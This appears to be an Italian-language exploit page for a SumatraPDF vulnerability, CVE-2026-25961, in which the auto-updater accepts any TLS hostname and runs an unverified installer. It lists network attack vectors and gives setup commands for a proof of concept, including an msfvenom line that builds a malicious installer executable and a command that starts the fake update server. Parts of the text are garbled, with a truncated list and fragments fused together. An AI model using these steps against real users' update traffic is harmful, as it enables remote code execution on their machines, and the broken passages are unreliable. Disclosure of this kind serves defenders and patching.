
SumatraPDF versioni 3.5.0 fino a 3.5.2 disabilitano la verifica del nome host TLS durante i controlli di aggiornamento # (usando INTERNET_FLAG_IGNORE_CERT_CN_INVALID) e non eseguono alcuna validazione della firma o dell'integrità # sull'installer scaricato.
CVE-2026-25961 – Esecuzione di Codice Remota tramite Server di Aggiornamento Maligno
Autore: Mohammed Idrees Banyamer
Data: Febbraio 2026
CVE: CVE-2026-25961
GHSA: GHSA-xpm2-rr5m-x96q
CVSS v3.1: 7.5 Alto (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
Versioni interessate: SumatraPDF 3.5.0 – 3.5.2
Testato su: Windows 10 / Windows 11
Le versioni di SumatraPDF dalla 3.5.0 alla 3.5.2 disabilitano la validazione del nome host TLS durante il controllo automatico degli aggiornamenti e non verificano la firma digitale o l'integrità del programma di installazione scaricato.
Un attaccante posizionato nella rete può:
https://www.sumatrapdfreader.org/update-check-rel.txtCreateProcessVettori d'attacco realistici: Wi-Fi non sicuro, router domestico/d'ufficio compromesso, dirottamento DNS, iniezione tramite proxy trasparente, ecc.
update-check-rel.txtpip install flask
# Esempio con msfvenom (opzionale)
msfvenom -p windows/x64/exec CMD=calc.exe -f exe > malicious_installer.exe
#Esegui il server:
python3 CVE-2026-25961_poc.py